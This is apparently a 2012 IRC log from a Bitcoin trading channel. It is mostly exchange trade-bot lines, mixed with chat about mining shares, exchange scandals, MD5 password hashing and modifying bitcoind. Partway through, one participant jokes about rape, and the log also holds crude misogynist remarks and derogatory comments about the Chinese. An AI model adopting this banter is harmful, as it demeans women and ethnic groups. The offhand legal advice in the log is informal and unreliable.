@ 0.00034243 = 7.578 BTC [+] Aug 16 18:43:28 [MPEX] [S.MPOE] 7300 @ 0.000343 = 2.5039 BTC [+] Aug 16 18:43:29 [MPEX] [S.MPOE] 9400 @ 0.00034969 = 3.2871 BTC [+] Aug 16 18:43:30 [MPEX] [S.MPOE] 1170 @ 0.00035038 = 0.4099 BTC [+] Aug 16 18:44:59 YARR paid :) Aug 16 18:50:59 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [-] Aug 16 18:52:13 yarrrr! Aug 16 18:52:27 yeah about assange i loled hard Aug 16 18:52:39 ecudaor is trolling the western world lulz Aug 16 18:55:24 [MPEX] [F.GIGA.ETF] 5200 @ 0.00106827 = 5.555 BTC [+] Aug 16 18:57:41 [GLBSE] [GIGAMINING] 1 @ 0.9999 BTC [-] Aug 16 19:00:16 gigamining at 1 btc wow Aug 16 19:01:18 i wonder if it will go up again Aug 16 19:02:21 [GLBSE] [BITCOINMINV] 10 @ 0.122 = 1.22 BTC [+] Aug 16 19:04:15 hard to say Aug 16 19:04:26 [GLBSE] [YABMC] 1 @ 0.114 BTC [-] Aug 16 19:04:40 YABMC remains low - but nothing announced RE ASIC Aug 16 19:04:47 still waiting Aug 16 19:06:25 [GLBSE] [GIGAMINING] 4 @ 0.9999 = 3.9996 BTC [-] Aug 16 19:06:26 [GLBSE] [GIGAMINING] 7 @ 1 = 7 BTC [+] Aug 16 19:09:25 [GLBSE] [PPT.DIV] 4 @ 0.4001 = 1.6004 BTC [-] Aug 16 19:09:42 [GLBSE] [PPT.DIV] 34 @ 0.4 = 13.6 BTC [-] Aug 16 19:10:04 possibly not. Aug 16 19:10:17 [GLBSE] [HYDRO.BONDS] 2 @ 1.459 = 2.918 BTC [-] Aug 16 19:10:46 [MPEX] [F.GIGA.ETF] 2640 @ 0.00106247 = 2.8049 BTC [-] Aug 16 19:10:47 [MPEX] [F.GIGA.ETF] 16175 @ 0.001 = 16.175 BTC [-] Aug 16 19:10:48 [MPEX] [F.GIGA.ETF] 18354 @ 0.00099981 = 18.3505 BTC [-] Aug 16 19:10:49 [MPEX] [F.GIGA.ETF] 8838 @ 0.00099782 = 8.8187 BTC [-] Aug 16 19:10:50 [MPEX] [F.GIGA.ETF] 3993 @ 0.00099389 = 3.9686 BTC [-] Aug 16 19:10:53 [GLBSE] [NASTY] 10 @ 0.51 = 5.1 BTC [+] Aug 16 19:12:04 [GLBSE] [RAREEARTH] 100 @ 0.00988 = 0.988 BTC [+] Aug 16 19:13:31 [GLBSE] [GOLD] 8 @ 0.0099 = 0.0792 BTC [+] Aug 16 19:17:20 13$ is well high Aug 16 19:17:24 easy to buy your own asic Aug 16 19:17:49 thats what i did, why buy when btc is at $5 for asic, wait until its $25 in nov then buy lol Aug 16 19:18:03 [GLBSE] [BITBOND] 2 @ 0.39979999 = 0.7996 BTC [+] Aug 16 19:18:05 even if i pay double in usd i still get 2 times as much Aug 16 19:20:14 [MPEX] [F.GIGA.ETF] 11555 @ 0.00099389 = 11.4844 BTC [-] Aug 16 19:20:15 [MPEX] [F.GIGA.ETF] 445 @ 0.00097641 = 0.4345 BTC [-] Aug 16 19:22:39 [GLBSE] [OBSI.HRPT] 1 @ 0.1038 BTC [-] Aug 16 19:22:57 [GLBSE] [ASICMINER] 16 @ 0.1049 = 1.6784 BTC [+] Aug 16 19:22:59 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Aug 16 19:24:04 [GLBSE] [BTCS] 1 @ 0.0101 BTC [+] Aug 16 19:24:32 So whos going to London and the Bitcoin conference? :) Aug 16 19:25:40 i'm not. Aug 16 19:25:56 lol Aug 16 19:26:01 intersango is now dead right? Aug 16 19:26:08 its going to be a fun evet Aug 16 19:26:23 they will just get hit about bitcoinica and intersango all the time Aug 16 19:26:35 Intersango is down as of this morning, but it's certainly not dead Aug 16 19:26:59 (trades aren't executing for some reason) Aug 16 19:27:13 [GLBSE] [OBSI.HRPT] 3 @ 0.1038 = 0.3114 BTC [-] Aug 16 19:27:37 cant get money out, only in Aug 16 19:27:37 lol Aug 16 19:27:37 area its a named party in a us lawsuit it can't afford to defend. Aug 16 19:27:43 the risks in using it are too great. Aug 16 19:27:51 way tooo great Aug 16 19:28:16 I just want to have a good time and support Bitcoins, I really hope that the whole even doesn't become a Bitcoinica/Intersango whine feast, with tons of angry bitcoineers :( Aug 16 19:28:21 that would destroy the whole thing Aug 16 19:28:33 from what i gather it's unavoidable. Aug 16 19:28:51 sigh xD oh well, I am going there for the people not for the speeches anyways. Aug 16 19:29:00 you mean for the girls ? Aug 16 19:29:13 pff yea because there are so many girls in Bitcoins xD Aug 16 19:29:18 well then ?! Aug 16 19:29:27 /r/girlsgonebitcoin Aug 16 19:29:41 I cashed out some coins with them yesterday, and it all went smoothly, but I will admit am consciously doing it a bit at a time, rather than all in one go. Aug 16 19:31:04 GirlsgoneBitcoins are just girls that make money from sad bitcoineers. They don't give a shit about Bitcoins, I doubt they will care to go to London for a bitcoin conference. Aug 16 19:31:33 [GLBSE] [BDT] 10 @ 0.96969799 = 9.697 BTC [+] Aug 16 19:31:34 [GLBSE] [BDT] 7 @ 0.96979799 = 6.7886 BTC [+] Aug 16 19:31:35 [GLBSE] [BDT] 10 @ 0.97 = 9.7 BTC [+] Aug 16 19:31:36 [GLBSE] [BDT] 23 @ 0.9778 = 22.4894 BTC [+] Aug 16 19:31:44 yeah, anyone who is into btc for the girls is well... sick in the head Aug 16 19:31:53 DeaDTerra: why? they could charge 50 btc for a blow job Aug 16 19:32:18 ahahah Aug 16 19:32:24 im into btc cuz i can convert it into gold and fiat and then give it to females... works much better:) Aug 16 19:32:55 hahahahah xD best answer ever :P Aug 16 19:34:26 Chaaaang are you going to london? Aug 16 19:34:40 im not going, sorry Aug 16 19:34:44 i have to get back to thailand Aug 16 19:35:18 also sadly i dont really support the intersango guys right now cuz of how many times the feed me bs about bitcoinica Aug 16 19:35:51 whats a good excel like thing that is free for windows? anything better than google docs? Aug 16 19:35:57 open office. Aug 16 19:36:44 i thought they killed that Aug 16 19:36:59 okay thats get to be better than this google thing Aug 16 19:37:04 it is. Aug 16 19:37:19 google docs sucks almost as bad as novell netware. Aug 16 19:37:36 appache open office? Aug 16 19:37:47 did they buy it? Aug 16 19:37:57 dunno Aug 16 19:38:08 [GLBSE] [TYGRR.BOND-PI] 6 @ 1.4799 = 8.8794 BTC [+] Aug 16 19:38:16 [GLBSE] [BDT] 1 @ 0.92000001 BTC [-] Aug 16 19:38:18 [GLBSE] [BDT] 5 @ 0.92 = 4.6 BTC [-] Aug 16 19:38:19 [GLBSE] [BDT] 18 @ 0.91000002 = 16.38 BTC [-] Aug 16 19:38:20 [GLBSE] [BDT] 1 @ 0.91000001 BTC [-] Aug 16 19:40:26 pirate sure killed my pi bonds lol Aug 16 19:40:32 move right down right after i sell lol Aug 16 19:44:05 [GLBSE] [BDT] 1 @ 0.91000001 BTC [-] Aug 16 19:48:19 [GLBSE] [BDT] 1 @ 0.974 BTC [+] Aug 16 19:48:21 [GLBSE] [BDT] 3 @ 0.975 = 2.925 BTC [+] Aug 16 19:48:22 [GLBSE] [BDT] 1 @ 0.9778 BTC [+] Aug 16 19:56:17 [GLBSE] [ASIC.COOP] 10 @ 0.3 = 3 BTC [-] Aug 16 19:59:45 [GLBSE] [OBSI.1MHS] 1 @ 0.07 BTC [-] Aug 16 20:00:06 [GLBSE] [BDT] 1 @ 0.9778 BTC [+] Aug 16 20:02:19 [GLBSE] [BDT] 1 @ 0.998 BTC [+] Aug 16 20:02:46 [GLBSE] [NYAN.C] 20 @ 1.069 = 21.38 BTC [+] Aug 16 20:02:51 [GLBSE] [BDT] 25 @ 0.999 = 24.975 BTC [+] Aug 16 20:02:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [-] Aug 16 20:02:59 mircea, open office is much better, thanks Aug 16 20:03:11 [GLBSE] [BDT] 3 @ 1 = 3 BTC [+] Aug 16 20:03:29 [GLBSE] [NYAN.B] 23 @ 1 = 23 BTC [+] Aug 16 20:03:44 [GLBSE] [DMC] 97 @ 0.07 = 6.79 BTC [-] Aug 16 20:03:46 [GLBSE] [DMC] 3 @ 0.07899998 = 0.237 BTC [+] Aug 16 20:03:52 [GLBSE] [TYGRR.BOND-B] 24 @ 0.1 = 2.4 BTC [-] Aug 16 20:04:15 Chaaaang-Noi enjoy. Aug 16 20:04:23 :) Aug 16 20:05:34 the only thing i need it for is to auto sum, where is that lol Aug 16 20:05:50 nvm found it Aug 16 20:05:52 awesome Aug 16 20:11:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [-] Aug 16 20:11:42 [GLBSE] [TYGRR.BOND-P] 6 @ 1 = 6 BTC [+] Aug 16 20:16:42 ;;tslb Aug 16 20:16:51 Time since last block: 4 minutes and 5 seconds Aug 16 20:23:55 [GLBSE] [OBSI.HRPT] 1 @ 0.1038 BTC [-] Aug 16 20:25:48 libreoffice Aug 16 20:26:31 chromium Aug 16 20:27:21 libreoffice is to open office as chromium is to chrome Aug 16 20:27:46 :p Aug 16 20:27:53 [GLBSE] [GIGAMINING] 5 @ 1.02999999 = 5.15 BTC [+] Aug 16 20:27:55 [GLBSE] [GIGAMINING] 3 @ 1.03 = 3.09 BTC [+] Aug 16 20:28:15 Azelphur: unless you mean that chromium fighter-jet game :P Aug 16 20:28:32 hehe Aug 16 20:28:45 anyone here happen to be lawyery btw? Aug 16 20:31:05 [GLBSE] [BTCMC] 10 @ 0.63 = 6.3 BTC [-] Aug 16 20:31:33 yes. Aug 16 20:32:34 mircea_popescu: so, I got this phone off ebay, "perfect condition" "new", when it got here it was obviously used, lots of damage, parts missing, etc. After a complaint the seller gave me a refund. I asked him to pay shipping to return the phone, but never heard from him since. How long until the phone is mine? Aug 16 20:32:56 [MPEX] [S.MPOE] 34800 @ 0.00035038 = 12.1932 BTC [+] Aug 16 20:32:57 depends on your jurisdictions. Aug 16 20:33:02 UK :p Aug 16 20:34:58 well, abandoned chattel. you've served notice. Aug 16 20:35:05 they're yours pretty much. Aug 16 20:35:17 surely there's a time limit on it? Aug 16 20:35:27 I mean it's only been like a day since I messaged him Aug 16 20:35:37 [GLBSE] [YABMC] 15 @ 0.1131 = 1.6965 BTC [-] Aug 16 20:35:39 [GLBSE] [YABMC] 10 @ 0.113 = 1.13 BTC [-] Aug 16 20:35:51 there is a limit but it's "reasonable". Aug 16 20:36:05 and in any case i don't see anyone sueing for conversion of a damaged phone. Aug 16 20:36:09 yay for "reasonable" Aug 16 20:36:13 what's your hurry anyway ? Aug 16 20:36:15 true lol Aug 16 20:36:24 mircea_popescu: because I either wanna use it, or buy another phone. Aug 16 20:36:31 you can use it lol Aug 16 20:36:37 + I sold my old phone to my brother and he's waiting for it Aug 16 20:36:45 [GLBSE] [GIGAMINING] 3 @ 1.03 = 3.09 BTC [+] Aug 16 20:36:47 [GLBSE] [TYGRR.BOND-P] 5 @ 1 = 5 BTC [+] Aug 16 20:36:48 I'd prefer not to spend ages setting it up, only to have to return it Aug 16 20:36:49 [GLBSE] [TYGRR.BOND-P] 3 @ 1 = 3 BTC [+] Aug 16 20:37:14 so then wait a coupla ages till next week lol Aug 16 20:37:21 haha Aug 16 20:39:55 [GLBSE] [GIGAMINING] 42 @ 1.0002 = 42.0084 BTC [-] Aug 16 20:41:21 [GLBSE] [GIGAMINING] 4 @ 1.0001 = 4.0004 BTC [-] Aug 16 20:41:42 [GLBSE] [GIGAMINING] 49 @ 1 = 49 BTC [-] Aug 16 20:42:20 [GLBSE] [BDT] 3 @ 0.97 = 2.91 BTC [-] Aug 16 20:44:01 hello Aug 16 20:46:32 hi Aug 16 20:46:55 [GLBSE] [BDT] 28 @ 0.91000001 = 25.48 BTC [-] Aug 16 20:46:57 [GLBSE] [BDT] 1 @ 0.91000001 BTC [-] Aug 16 20:46:58 [GLBSE] [BDT] 51 @ 0.9 = 45.9 BTC [-] Aug 16 20:47:00 [GLBSE] [BDT] 2 @ 0.80000001 = 1.6 BTC [-] Aug 16 20:47:01 [GLBSE] [BDT] 18 @ 0.8 = 14.4 BTC [-] Aug 16 20:47:34 [GLBSE] [BDT] 50 @ 0.8 = 40 BTC [-] Aug 16 20:47:53 hows it going mircea_popescu Aug 16 20:47:55 Ìû Aug 16 20:48:05 pretty good so far. Aug 16 20:48:59 [GLBSE] [HYDRO.BONDS] 2 @ 1.4598 = 2.9196 BTC [+] Aug 16 20:49:10 [GLBSE] [TYGRR.BOND-P] 9 @ 0.999 = 8.991 BTC [-] Aug 16 20:49:10 [GLBSE] [TYGRR.BOND-P] 30 @ 0.991 = 29.73 BTC [-] Aug 16 20:49:12 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9902 = 3.9608 BTC [-] Aug 16 20:49:13 [GLBSE] [TYGRR.BOND-P] 2 @ 0.9901 = 1.9802 BTC [-] Aug 16 20:49:14 [GLBSE] [TYGRR.BOND-P] 55 @ 0.99 = 54.45 BTC [-] Aug 16 20:49:18 u Aug 16 20:49:22 more bdt drama Aug 16 20:49:22 Ìû Aug 16 20:49:24 haha Aug 16 20:49:33 lego? Aug 16 20:49:35 !pl Aug 16 20:49:35 !pl [@] [] Aug 16 20:49:37 [GLBSE] [GIGAMINING] 3 @ 1.029 = 3.087 BTC [+] Aug 16 20:49:46 Chaaaang-Noi? Aug 16 20:49:48 nefario? Aug 16 20:50:10 hi Aug 16 20:50:17 whats up? Aug 16 20:50:28 [GLBSE] [GIPPT] 10 @ 1.09 = 10.9 BTC [-] Aug 16 20:50:28 nuthn Aug 16 20:51:07 i forget what is bdt ? Aug 16 20:51:21 no idea Aug 16 20:51:41 it's like bitcoinica Aug 16 20:51:49 but not as good Aug 16 20:51:58 lol anything is better than bitcoinica Aug 16 20:51:58 security wise that is Aug 16 20:52:00 well they didn't get hacked Aug 16 20:52:05 they hacked themselves. Aug 16 20:52:08 who didn't Aug 16 20:52:10 Chaaaang-Noi: Les Brasseurs du Temps? Aug 16 20:52:11 like a girl slipping herself roofies. Aug 16 20:52:11 oh Aug 16 20:52:13 aha Aug 16 20:52:38 bdt = bitdaytrade Aug 16 20:52:52 also glbse bond Aug 16 20:53:03 !ticker bdt Aug 16 20:53:14 [GLBSE:BDT] [Bid: 0.8] [Ask: 0.97] [Spread: 0.17] [Last: 0.8] [24hVol: 677.95006849] [7dAvg: 1.00720586] Aug 16 20:53:19 so, are the 7% zeros gone forever? Aug 16 20:53:46 kakobreklaa you at home yet btw ? Aug 16 20:54:00 just arrived Aug 16 20:54:36 can i has ticker nao ? Aug 16 20:54:50 !pl BDT 2012-08-09 Aug 16 20:54:50 Requesting data from GLBSE (might take a while). Aug 16 20:54:51 Invalid price supplied. Aug 16 20:55:11 !pl BDT 1 2012-08-09 Aug 16 20:55:12 Requesting data from GLBSE (might take a while). Aug 16 20:55:18 BDT [1@1BTC] (since: 2012-08-09) paid: 0.03 BTC. Last price: 0.8 BTC. Capital gain: -0.2 BTC. Total: -0.17 BTC. (-17%) Aug 16 20:55:39 you can drop the date if you are looking for all data since begining Aug 16 20:56:13 !pl COGNITIVE Aug 16 20:56:14 !pl [@] [] Aug 16 20:56:20 !pl COGNITIVE 1 Aug 16 20:56:20 Requesting data from GLBSE (might take a while). Aug 16 20:57:00 COGNITIVE [1@1BTC] paid: 0.07560087 BTC. Last price: 0.6309 BTC. Capital gain: -0.3691 BTC. Total: -0.29349913 BTC. (-29.3%) Aug 16 20:57:43 BTC: Best Ask 13.49699 Aug 16 20:57:47 [GLBSE] [OBSI.HRPT] 7 @ 0.10389 = 0.7272 BTC [+] Aug 16 20:58:38 this thing is going to hot 20 EUR by September Aug 16 20:59:00 could happen. Aug 16 20:59:07 >>Alberto says that it was originally bcrypt but there were implementation issues so he temporarily switched to MD5. As mentioned I'm not a security expert so I can't assess how plausible this is. I'll wait for Alberto to make a clarification of this and other issues. Aug 16 20:59:11 LOLZ Aug 16 20:59:41 wh... wha... what? Aug 16 20:59:50 well i warned about this long time ago Aug 16 21:00:16 some quality drama indeed. Aug 16 21:00:25 i met this girl Aug 16 21:00:31 and i originally was gonna ask for sex Aug 16 21:00:39 but then there were implementation issues so i just raped her isntead. Aug 16 21:00:44 :DDDDDDDDD Aug 16 21:00:46 i'm not a lawyer but i'm sure it should be ok. Aug 16 21:00:47 lol Aug 16 21:01:03 yes, it's just fine Aug 16 21:01:07 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [+] Aug 16 21:02:10 this will become famous as "the bcrypt defense" Aug 16 21:03:09 damn, I wanted to buy this ASICMINER but I had to travel and lost out on IPO Aug 16 21:04:03 so it went up 5% Aug 16 21:04:55 EskimoBob: DMC holds a lot of asicminer shares. Aug 16 21:05:48 Diablo-D3: I hope not too many :) this is a risky one and chinese are involved so this can be just another scam Aug 16 21:06:10 EskimoBob: its enough to back the next stage of growth BEFORE they start paying out. Aug 16 21:06:56 [GLBSE] [BDK.BND] 7 @ 0.1 = 0.7 BTC [+] Aug 16 21:07:18 did they sell all the shares or will be there another dump at 1? Aug 16 21:07:54 *will there be* Aug 16 21:08:07 afaik there are private deals to be made still Aug 16 21:08:16 larger orders Aug 16 21:08:16 EskimoBob: no more Aug 16 21:08:23 there are private deals, but you'll have to talk to deadterra Aug 16 21:08:28 hes the gateway on those Aug 16 21:08:28 õk Aug 16 21:08:39 whos chinese on asicminer Aug 16 21:08:58 all 3 of them are in china I think Aug 16 21:09:51 everybody's in china. Aug 16 21:09:56 fkn americans, cant even get the fkn ASIC done without the CH slave drivers .. LOL Aug 16 21:10:15 china is in everybody. Aug 16 21:10:31 [GLBSE] [PUREASIC] 4 @ 0.71 = 2.84 BTC [+] Aug 16 21:11:07 >>As far as I can tell Alberto can fix the current issues; and even if Bitdaytrade ends up a dead end (merely the bad press from this controversy could harm its growth), he can still fulfill the bond contract. Aug 16 21:11:14 is meni high or something Aug 16 21:11:33 EskimoBob: its not that Aug 16 21:11:43 the fab company is one of the largest companies in the world Aug 16 21:11:47 it just happens they are in china Aug 16 21:12:32 "kakobreklaa | china is in everybody. " no wonder china is synonym to shit Aug 16 21:12:46 china is not in me Aug 16 21:12:47 for* Aug 16 21:13:18 meni is prolly just exposed to them kakobreklaa Aug 16 21:14:06 imho hes gonna loose on that one then Aug 16 21:14:07 Diablo-D3: dry humping a panda? Aug 16 21:14:16 -tan is japanese. Aug 16 21:14:31 usagi: yes, but the japanese have drawn -tans of every country Aug 16 21:14:34 [GLBSE] [YABMC] 1 @ 0.1179 BTC [+] Aug 16 21:14:39 and, well, everything really Aug 16 21:14:42 theres even a wikipedia tan Aug 16 21:14:56 Who wants to make 200 bitcoins modifying bitcoind for me Aug 16 21:15:04 what about Domo-kun? Aug 16 21:15:33 Ive always wanted a domo kun, small enough to sit on the corner of my monitor Aug 16 21:15:43 usagi: I can modify it for you if you want. Fork over the coin and I'll make sure it's modified Aug 16 21:15:57 [GLBSE] [DMC] 10 @ 0.053 = 0.53 BTC [-] Aug 16 21:15:59 [GLBSE] [DMC] 40 @ 0.0501 = 2.004 BTC [-] Aug 16 21:16:00 [GLBSE] [DMC] 450 @ 0.05 = 22.5 BTC [-] Aug 16 21:16:18 what do you need usagi Aug 16 21:16:20 Diablo-D3: you can use permanent marker to draw one :) Aug 16 21:16:28 EskimoBob: lol Aug 16 21:16:31 i did that to several white boards just for fun Aug 16 21:16:35 I'm looking at the code and I feel so depressed im never going to figure this out Aug 16 21:16:36 actually, I think I saw a papercraft one Aug 16 21:16:39 it would literally take me 2 months Aug 16 21:16:43 but goddamned do I suck at papercraft =/ Aug 16 21:16:53 I need to be able to encrypt private keys on a key by key basis Aug 16 21:17:13 usagi: I can do it in one but no guarantees. I have never programmed :) Aug 16 21:17:35 usagi: erm Aug 16 21:17:43 I'm looking at CWallet::AvailableCoins() for example, which is a good place to prevent coins from being spent, if you can connect a tx to an address/privkey Aug 16 21:17:46 usagi: ask gmaxwell or sipa Aug 16 21:18:18 [GLBSE] [ASICMINER] 50 @ 0.105 = 5.25 BTC [+] Aug 16 21:18:19 or luke Aug 16 21:18:21 [GLBSE] [BDK.BND] 23 @ 0.1 = 2.3 BTC [+] Aug 16 21:18:24 [GLBSE] [BDK.BND] 35 @ 0.099 = 3.465 BTC [-] Aug 16 21:18:25 So theoretically if I put a bool locked in, say, CWalletKey (?).... and then.... um Aug 16 21:18:41 [GLBSE] [GIGAMINING] 5 @ 0.995 = 4.975 BTC [-] Aug 16 21:18:50 Then I need to make that variable persist and I'm already lost Aug 16 21:19:08 [GLBSE] [GIGAMINING] 1 @ 0.995 BTC [-] Aug 16 21:19:33 and the goal of this is? Aug 16 21:20:07 command "encryptkey " and associated commands Aug 16 21:20:37 Kind of like encrypting a whole wallet and still being able to maintain balance info as transactions come in Aug 16 21:20:39 but on a key by key basis Aug 16 21:21:27 aha Aug 16 21:21:30 For 200 though I don't want it in main for at least 1 year :p Aug 16 21:21:40 Well maybe 6 mo Aug 16 21:21:43 I need an edge Aug 16 21:22:14 Can you do it Kakobreklaa? Aug 16 21:22:35 [GLBSE] [BTC-MINING] 2 @ 0.98879 = 1.9776 BTC [+] Aug 16 21:22:43 ill take a look Aug 16 21:23:25 lol it wouldn't get merged into main anyway Aug 16 21:23:40 wasn't that guy that coded some useful coin control stuff a year ago, it;s still not merged ? Aug 16 21:23:41 Well the idea I have so far is to mark each private key (and address) with a locked flag, as I stated, then freeze spending in CWallet::AvailableCoins() for example. Then a second feature would be to encrypt individual keys. Aug 16 21:23:58 Yes the coin control stuff is a good place to start Aug 16 21:24:13 Instead of selecting addresses it would exclude flagged addresses Aug 16 21:24:38 The next step would be to persist the exclusionary information and encrypt the keys. Aug 16 21:24:57 [GLBSE] [ASICMINER] 8 @ 0.105 = 0.84 BTC [+] Aug 16 21:26:22 [MPEX] [S.MPOE] 7900 @ 0.00034931 = 2.7595 BTC [-] Aug 16 21:28:40 [MPEX] [S.BVPS] 700 @ 0.00376746 = 2.6372 BTC [-] Aug 16 21:35:12 [GLBSE] [FPGAMINING] 4 @ 0.9101 = 3.6404 BTC [-] Aug 16 21:35:14 [GLBSE] [FPGAMINING] 5 @ 0.91 = 4.55 BTC [-] Aug 16 21:35:17 [GLBSE] [FPGAMINING] 5 @ 0.9 = 4.5 BTC [-] Aug 16 21:35:57 [GLBSE] [DMC] 379 @ 0.05 = 18.95 BTC [-] Aug 16 21:37:56 [MPEX] [S.MPOE] 2500 @ 0.00034931 = 0.8733 BTC [-] Aug 16 21:37:58 [MPEX] [S.MPOE] 29658 @ 0.00033431 = 9.915 BTC [-] Aug 16 21:37:59 [MPEX] [S.MPOE] 38455 @ 0.00033199 = 12.7667 BTC [-] Aug 16 21:43:01 [MPEX] [S.MPOE] 6081 @ 0.00035038 = 2.1307 BTC [+] Aug 16 21:43:02 [MPEX] [S.MPOE] 13500 @ 0.0003572 = 4.8222 BTC [+] Aug 16 21:43:04 [MPEX] [S.MPOE] 42400 @ 0.00036186 = 15.3429 BTC [+] Aug 16 21:43:05 [MPEX] [S.MPOE] 35521 @ 0.00036614 = 13.0057 BTC [+] Aug 16 21:43:06 [MPEX] [S.MPOE] 40435 @ 0.0003838 = 15.519 BTC [+] Aug 16 21:43:07 [MPEX] [S.MPOE] 54000 @ 0.00039586 = 21.3764 BTC [+] Aug 16 21:43:08 [MPEX] [S.MPOE] 8063 @ 0.0003965 = 3.197 BTC [+] Aug 16 21:52:03 [GLBSE] [PUREMINING] 1 @ 0.1403 BTC [-] Aug 16 21:52:10 [GLBSE] [PUREMINING] 1 @ 0.1402 BTC [-] Aug 16 21:52:12 [GLBSE] [PUREMINING] 15 @ 0.13777 = 2.0666 BTC [-] Aug 16 21:52:15 [GLBSE] [PUREMINING] 1 @ 0.1375 BTC [-] Aug 16 21:52:17 [GLBSE] [PUREMINING] 4 @ 0.1375 = 0.55 BTC [-] Aug 16 21:52:20 [GLBSE] [PUREMINING] 2 @ 0.135 = 0.27 BTC [-] Aug 16 21:52:27 [GLBSE] [PUREMINING] 4 @ 0.13 = 0.52 BTC [-] Aug 16 21:52:59 [GLBSE] [BIB.PIRATE] 5 @ 1 = 5 BTC [+] Aug 16 21:53:42 [GLBSE] [FPGAMINING] 2 @ 0.93 = 1.86 BTC [+] Aug 16 21:54:01 [GLBSE] [BIB.PIRATE] 23 @ 1 = 23 BTC [+] Aug 16 21:55:06 he'll be back. Aug 16 21:55:16 kakobreklaa: do me a favor Aug 16 21:55:18 make two bots Aug 16 21:55:22 one glbse one mpex Aug 16 21:55:33 so I can put the mpex one on ignore Aug 16 21:56:04 you should make that client side Aug 16 21:56:22 yeah but ignore is server side so no wasted bandwidth =P Aug 16 21:56:26 hopefully cryptostocks will be streaming soon as well Aug 16 21:56:54 server side? Aug 16 21:57:00 ignore is client side Aug 16 21:57:27 apparently macfeylard is new to this entire interwebz thing. Aug 16 21:57:33 er Aug 16 21:57:34 kakobreklaa: right Aug 16 21:57:35 it is Aug 16 22:08:07 !ticker s.mpoe Aug 16 22:08:28 GLBSE returned nothing. Aug 16 22:08:35 hehe Aug 16 22:08:40 i know whats the problem Aug 16 22:08:46 hold on. Aug 16 22:09:25 :p Aug 16 22:10:10 hdd died and raid is being rebuilt and some other funky stuff is happening on VMs Aug 16 22:10:46 o ? Aug 16 22:19:23 !ticker s.mpoe Aug 16 22:19:25 GLBSE returned nothing. Aug 16 22:19:30 o? Aug 16 22:19:35 [GLBSE] [FPGAMINING] 4 @ 0.93 = 3.72 BTC [+] Aug 16 22:19:48 !ticker gigamining Aug 16 22:19:59 [GLBSE:GIGAMINING] [Bid: 0.9725] [Ask: 0.995] [Spread: 0.0225] [Last: 0.995] [24hVol: 291.40071997] [7dAvg: 1.09786791] Aug 16 22:20:09 !ticker s.mpoe Aug 16 22:20:10 GLBSE returned nothing. Aug 16 22:20:22 not a valid ticker i guess Aug 16 22:20:35 but anyway it wouldnt work before even if it was valid Aug 16 22:21:11 owait Aug 16 22:21:15 !ticker S.MPOE Aug 16 22:21:16 GLBSE returned nothing. Aug 16 22:21:23 [GLBSE] [OBSI.HRPT] 17 @ 0.1015 = 1.7255 BTC [-] Aug 16 22:21:26 MPOE.ETF ? Aug 16 22:21:39 i imagined you took assbot offline to add the mpex tickers. Aug 16 22:21:45 ah Aug 16 22:21:53 no, sorry not yet Aug 16 22:21:59 this was a server faliue Aug 16 22:22:02 ure Aug 16 22:22:47 not sure if ill be able to do it today Aug 16 22:22:59 [03:10:12] hdd died and raid is being rebuilt and some other funky stuff is happening on VMs Aug 16 22:23:00 ouch Aug 16 22:23:23 new hd is in place and all will be well :) Aug 16 22:25:40 [GLBSE] [PUREMINING] 2 @ 0.09001 = 0.18 BTC [-] Aug 16 22:25:42 [GLBSE] [PUREMINING] 9 @ 0.09 = 0.81 BTC [-] Aug 16 22:25:45 man I wish obsi.1mhs dividend day was coming soon Aug 16 22:27:09 [GLBSE] [OBSI.HRPT] 6 @ 0.1015 = 0.609 BTC [-] Aug 16 22:27:22 [GLBSE] [MOORE] 3 @ 0.5101 = 1.5303 BTC [-] Aug 16 22:27:42 [MPEX] [O.HASH.P10TH] 150000 @ 0.02745586 = 4118.379 BTC [-] Aug 16 22:27:46 [GLBSE] [MOORE] 2 @ 0.51 = 1.02 BTC [-] Aug 16 22:29:58 [GLBSE] [DMC] 250 @ 0.04 = 10 BTC [-] Aug 16 22:30:19 [GLBSE] [BTC-MINING] 8 @ 0.98879 = 7.9103 BTC [+] Aug 16 22:30:22 [GLBSE] [BTC-MINING] 1 @ 0.9888 BTC [+] Aug 16 22:30:36 [GLBSE] [OBSI.HRPT] 1 @ 0.10389 BTC [+] Aug 16 22:30:41 [GLBSE] [BTC-MINING] 1 @ 0.9888 BTC [+] Aug 16 22:34:41 [MPEX] [S.BVPS] 200 @ 0.00376746 = 0.7535 BTC [-] Aug 16 22:35:52 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 16 22:37:58 [GLBSE] [ASICMINER] 3 @ 0.1 = 0.3 BTC [-] Aug 16 22:38:42 [GLBSE] [CPA] 3 @ 0.081 = 0.243 BTC [-] Aug 16 22:38:54 https://bitcointalk.org/index.php?topic=101109.0 Aug 16 22:39:22 oh the bot is slow? Aug 16 22:39:25 or dead? Aug 16 22:39:37 "Jonathan Ryan Owens locked Rebate, Zip.A, Alberto & BDT thread " Aug 16 22:39:38 [GLBSE] [YABIF] 1 @ 0.7 BTC [-] Aug 16 22:39:43 he makes a claim Aug 16 22:41:08 and thus ended the Kronos project, and any and all involvement with Alberto and my group. Aug 16 22:41:09 wait. Aug 16 22:41:13 kronos is ALSO dead !? Aug 16 22:41:25 wasn't this to be the end-all beat-all securities exchange ? Aug 16 22:41:38 he claimed he could do some magic Aug 16 22:41:50 he and mathew took the money and ran, blamed it on this fall guy Aug 16 22:41:58 i made a thead so people could respond Aug 16 22:42:05 he said a bunch of bs then locked it Aug 16 22:42:13 how can he lock it ? Aug 16 22:42:17 he did Aug 16 22:42:21 you can lock your own threads Aug 16 22:42:27 my thread however is not locked Aug 16 22:42:35 so you can post Aug 16 22:42:37 [GLBSE] [ASIC.COOP] 25 @ 0.25 = 6.25 BTC [-] Aug 16 22:42:51 Will technically it is not magic, the only problem is that it's not 100% safe against exploits Aug 16 22:43:20 ZIpCOnf still works and can still be used, but not publically and not for everyone. It can still be used by trusted parties. Aug 16 22:43:32 The realization that I had gotten in to bed with a criminally minded guy, leaves me to only blame myself. Nothing changes the fact that I am ultimately responsible to the people who have been in my support. What's worse is that *very few* real world investors want to touch anything Bitcoin related with a ten foot pool. If you have to ask yourself why, take a look at the current price. Look at the ponzis (Pirate), look at the most ro Aug 16 22:43:32 bust markets and ask yourself "If I was an investor, would I put any faith or money into Bitcoin 